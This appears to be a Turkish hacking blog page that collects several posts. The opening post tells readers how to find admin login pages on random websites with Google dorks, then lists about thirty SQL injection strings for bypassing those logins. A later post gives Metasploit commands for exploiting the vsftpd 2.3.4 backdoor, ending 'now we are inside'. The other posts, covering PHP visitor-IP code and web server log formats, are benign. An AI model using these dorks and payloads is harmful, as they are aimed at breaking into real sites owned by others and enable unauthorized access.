Newest Post

Bypass nedir ? 

Bana göre bypass script kodlanmasındaki hatalardan yararlanarak admin login ve pass ' ı bug 'a sokarak giriş yapmamızı sağlayan küçük bir hata ve büyük bir zarar  





Başlayalım hadi (

ByPass için dork nasıl yazıcağız nasıl site bulabileceğiz ? 

ByPass dorklarımızı kendimiz oluşturalım  

Örnek çok kullanılan dorklar : 

Kod:
inurl:/admin/login.php
inurl:/administrator/index.php
inurl:/admins/login.php
inurl/admin1/login.php


Bunlar çok kullanılan favori dorklar arasındadır 

Ama hacklenen siteleri kaç kere hackleyebileceğizki hep aynı siteler 

Öncelikle bir sitenin admin panelini buluyoruz 


ByPass için Login ve Pass lar ; 



Kod:

'=' 'or'
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1-- 
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--




Arkadaşlar bu dorklardan fazla site çıkmayabilir bunun içinde diğer şekilde şöyle bir mantıkla kendi kafamızdaki kelimeler ile site çıkartabiliriz .. Örnek ; 

Kod:
inurl:admin/login.php intext:mercedes
inurl:admin/login.php intext:lenovo

intext Komutuna kelime ekleyerek daha değişik siteler çıkartabilirsiniz 

Kod:
inurl:/manager/login.php
inurl:/panelv2/login.php
inurl:/panel/login.php
inurl:/eng/login.php




Tag :, Tag :, Tag :, Tag :, Tag :, Tag :, Tag :
Nedir bu PHP? 

  PHP, 1994 yılında Rasmus Lerdorf tarafından geliştirilmiştir. HTML içine gömülebilen ve açık kaynakkodlu bir betik dilidir. Sözdiziminin çoğunu C, Java ve Perl’den almış olsa da betiği bu dillerden daha farklı bir yapıdadır. Sunucu tarafında çalıştırılan bir dildir. Yani, içinde PHP kodu barındıran bir siteye bağlanan kullanıcılar buradaki koda erişemez ve müdahale edemezler, yalnızca kodlar sonucu ortaya çıkan görseli görürler.




  PHP kodu başlangıç etiketi olan <?php* ve bitiş etiketi olan ?> etiketleri arasına yazılır. Bu etiketler bir HTML dosyasının içinde “PHP kipine” geçişi sağlar. Buna bir örnek verecek olursak;

<!DOCTYPE HTML>
<html>
    <head>
        ...Burada bazı HTML kodları bulunuyor...
    </head>

    <body>
        <?php
            echo "Merhaba, ben bir PHP betiğiyim!";
        ?>
        ...Burada da HTML kodları bulunuyor...
    </body>
</html>

Burada sayfa yüklenirken <?php başlangıç etiketi görüldüğü anda PHP kipine geçiş yapılır ve ?>bitiş etiketini okuyana kadar gördüğü tüm kodları PHP kodu olarak ele alır. Sonuç olarak bu kod ekrana “Merhaba, ben bir PHP betiğiyim!” yazısını bastıracaktır.


 Peki PHP kullanarak siteyi ziyaret eden kişinin IP adresine nasıl ulaşıyoruz?

  Ziyaretçinin IP adresine ulaşmaya genellikle güvenlik, doğrulama, spamları önleme gibi nedenlerle ihtiyaç duyabiliriz.   PHP’de bunu elde etmek için başvurabileceğiniz iki farklı yol bulunmaktadır. Bu iki yol, değerlerin nasıl ve nereden alındığı konusundaki farkları dışında birbirleriyle aynı işlevi yerine getirirler. Bunlardan ilki olan getenv() PHP’deki ortam değişkenleri yardımıyla girilen parametrenin değerini döndürür ve ikincisi olan $_SERVER parametrenin değerini web sunucusundan çeker.
  "$_SERVER" başlıklar, yollar(path) ve betiklerin yerleri gibi bilgileri içeren bir dizidir ve bir web sunucusu (örneğin, Apache) tarafından oluşturulur. Bu dizideki girdiler HTTP sunucusu tarafından atanır. Kullanımı "$_SERVER['parametre']" şeklindedir.   "getenv()" belirtilen bir ortam değişkeninin değerini döndürür. Kullanımı "getenv ('parametre')" şeklindedir.   Proxy sunucusunu algılamaması için parametrenin olduğu kısma REMOTE_ADDR yazmalısınız. REMOTE_ADDR geçerli sayfayı görüntüleyen kullanıcının IP adresidir.   Proxy sunucusunu algılaması için ise HTTP_CLIENT_IP, HTTP_X_FORWARDED_FOR, HTTP_X_FORWARDED, HTTP_FORWARDED_FOR, HTTP_FORWARDED parametrelerini yazmalısınız. Bunlar, bu proxy sunucusuna bağlanan kullanıcının IP adresini veren parametrelerdir.




<!DOCTYPE html>
<html>

    <head>
        ...
    </head>

    <body>
        ...
        <?php
            $publicip= 0;

            if (getenv('HTTP_CLIENT_IP')) {
                $localip = getenv('REMOTE_ADDR');
                $publicip = getenv('HTTP_CLIENT_IP');
            } else if(getenv('HTTP_X_FORWARDED_FOR')) {
                $localip = getenv('REMOTE_ADDR');
                $publicip = getenv('HTTP_X_FORWARDED_FOR');
            } else if(getenv('HTTP_X_FORWARDED')) {
                $localip = getenv('REMOTE_ADDR');
                $publicip = getenv('HTTP_X_FORWARDED');
            } else if(getenv('HTTP_FORWARDED_FOR')) {
                $localip = getenv('REMOTE_ADDR');
                $publicip = getenv('HTTP_FORWARDED_FOR');
            } else if(getenv('HTTP_FORWARDED')) {
                $localip = getenv('REMOTE_ADDR');
                $publicip = getenv('HTTP_FORWARDED');
            } else {
                $localip = getenv('REMOTE_ADDR');
            }
               
            if ($publicip != 0) {
                echo "<h3>Public IP'niz : $publicip </h3>" ;
                echo "<h3>Local IP'niz : $localip </h3>" ;
            } else {
                echo "<h3>Local IP'niz : $localip </h3>" ;                 
            }
        ?> 
        ... 
    </body>

</html>



 Burada gerçekleşen işlemlerden kısaca bahsedecek olursak, siteye giren ziyaretçinin bir internet servis sağlayıcının atadığı public IP üzerinden girip girmediği kontrol edilecektir.
  Eğer public IP üzerinden girmişse ortam değişkenleri yardımıyla local ve public IP adreslerinin değerlerini döndürüp, bu değerleri sırasıyla aynı isimli değişkenlere atayacaktır. Burada “$publicip” değişkenine ziyaretçinin public IP adresi atanacağı için değeri değişecek ve “0” olmayacaktır. Buna bağlı olarak altta bulunan “if” koşulu sağlanacağı için ekrana şu çıktıyı verecektir:
"Public IP'niz : ..." "Local IP'niz : ..."   Eğer public IP üzerinden girmemişse direkt olarak local IP adresini değişkene atayacaktır. Bu durumda “$publicip” değişkeninin değeri “0” olarak kalacak, “if” koşulu sağlanmayacağı için “else”e geçiş yapılacaktır. Buna bağlı olarak ekranda sadece aşağıdaki çıktı görünecektir:
"Local IP'niz : ..." Sonuç olarak bu şekilde siteyi ziyaret eden kullanıcının IP adresine ulaşmış oluyorsunuz


kodun tamamı burada

Tag :, Tag :, Tag :, Tag :, Tag :, Tag :, Tag :
Apache Web Sunucusu ve Log Kayıtları

Açık kaynak kodlu, esnek, sağlam ve performanslı olduğu için apache çok tercih edilmektedir.
Çok kapsamlı ve esnek bir loglama imkanına sahiptir.
Error log ve Access log adlı iki günlük dosyası bulunmaktadır.
Access log (Erişim logları): Web sunucusunda barınan internet sitesine gelen ziyaretçilerin kayıt altına alındığı dosyadır. Kullanıcıların hangi dizinlere eriştiği, web sunucunun isteklere nasıl tepki verdiği ve ziyaretçilerin hangi tür web tarayıcı bilgilerini kullandığını vb. bilgileri görebilirsiniz.

Örnek bir apache log satırı:

88.238.104.122 – – [18/Jun/2017:21:15:31 +0300] “GET /hakkinda HTTP/1.1” 200 740“http://www.site.com/category/linux/” “Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.104 Safari/537.36”

Error log (Sunucu hata günlüğü): Apache httpd tarafından istekler işlenirken saptanan hatalar ve tanı bilgileri bu dosyaya gönderilir. Sunucu ile ilgili herhangi bir sorunla karşılaşıldığında, neyin yanlış gittiğini öğrenmek için bakılacak dosyadır.

Örnek bir apache error log satırı:

Sun Jun 18 20:20:09.961372 2017] [core:error] [pid 16637:tid 4328636416] [client 88.238.104.122 Dosya yok: /usr/local/apache2/htdocs/favicon.ico

ISS Web Sunucusu ve Log Kayıtları

Windows tabanlı işletim sistemlerinde internet sitelerinin yayınlanmasını ve web uygulamalarının çalışmasını sağlayan Microsoft tarafından geliştirilen web sunucu yazılımına ISS denir.
ISS uygulaması üzerinde yayın yapan internet sitelerine ait erişim log kayıtları değiştirilmediği takdirde “inetpub\logs\Logfiles” dizininde kayıt altına alınmaktadır.
ISS uygulamasında log kayıtları farklı şekillerde kayıt altına alınabilir; IIS, NCSA, W3C… Herhangi bir değişiklik yapmadığınız takdirde varsayılan olarak W3C formatında kayıt altına alır.
Loglama konfigürasyonunun doğru bir şekilde yapılması olası bir saldırı sonucu inceleme aşamasında oldukça önem taşımaktadır.
Loglanması istenilen alanların doğru bir şekilde uzman bir kişinin yardımıyla düzenlenmesi fayda sağlayacaktır. Tabi bu durum sadece ISS için değil diğer tüm web sunucular için de geçerlidir.



Örnek bir ISS Log satırı:

#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2002-05-24 20:18:01
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-bytes cs-bytes time-taken cs(User-Agent) cs(Referrer)
2002-05-24 20:18:01 172.224.24.114 – 206.73.118.24 80 GET /Default.htm – 200 7930 248 31 Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+2000+Server) http://64.224.24.114/


Nginx Web Sunucu ve Log Kayıtları


Nginx Rus mühendisler tarafından mail sunucu olarak geliştirilmiş ve sonrasında web sunucuları için uyumlu hale getirilmiştir.
Performansı ile oldukça takdir toplayan bu web sunucu yazılımı, yüksek trafikli siteler için oldukça idealdir.
Ayrıca apache ve litespeed ile yapılan kıyaslamalarda cpu kullanımının daha az olduğu görülmüştür.
Varsayılan olarak, nginx, faaliyetleriyle ilgili bilgileri iki tür günlükte yazar: error log (hata günlüğü) ve access log (erişim günlüğü).
Linux, FreeBSD türevleri, Solaris, MacOS X, Windows vb. işletim sistemleri üzerinde çalışabilir.
Varsayılan olarak error log ve access log aşağıda belirtilen dizinlerde bulunur.
/var/log/nginx/error.log
/var/log/nginx/access.log
Örnek bir nginx access.log satırı:

88.238.104.122– – [23/May/2017:13:50:59 +0000] “POST /wordpress/wp-admin/post.php HTTP/1.1” 200 2 “http://www.site.com/wordpress/wp-admin/post-new.php” “Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.25 Safari/534.3”

Örnek bir nginx error.log satırı:

2017/03/23 13:15:25 [error] 19997#0: *1 open() “/var/www/nginx/phpmy-admin/scripts/index.php” failed (2: No such file or directory), client: 88.238.104.122, server: localhost, request: “GET /phpmy-admin/scripts/index.php HTTP/1.1”, host: www.site.com

EVET ARKADAŞLAR İLK ÖNCE FTP NEDİR KISACA BU PORT ÜZERİNDE KONUŞUCAK OLURSAK DOSYA TRANFERLERİNDE KULLANILAN BİR KAPIDIR DİYEBİLİRİZ.



PORT ZAFİYETİNİ NASIL İSTİSMAR EDİYORUZ ONA BAKALIM.



1. root@kali:~# route -n  BU KOMUT BİZİM AĞ GEÇİT İPMİZİ YANİ MODEM İPSİNİ VERİR.
BU KOMUTLA İPMİZİ ÖĞRENDİKTEN SONRA TERMİNALE;

zenmap KOMUTUNU GİRİP İP ADRESİMİZİN YANINA /24 YAZARAK VE DİĞER AYARLARI RESİMDEKİ GİBİ YAPARAK SCANBUTONUNA BASIN.




ZAFİYETLİ MAKİNEMİZİ BULDUKTAN SONRA TERMİNALE GEÇİP;

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options
set RHOST HEDEFİP 
msf exploit(vsftpd_234_backdoor) > exploit

KOMUTLARINI YAZDIKTAN SONRA ARTIK İÇERDEYİZ.



iyi çalışmalar

// Copyright © WELCOME Se☪uЯity Candidate //Anime-Note//Powered by Blogger // Designed by Johanes Djogan //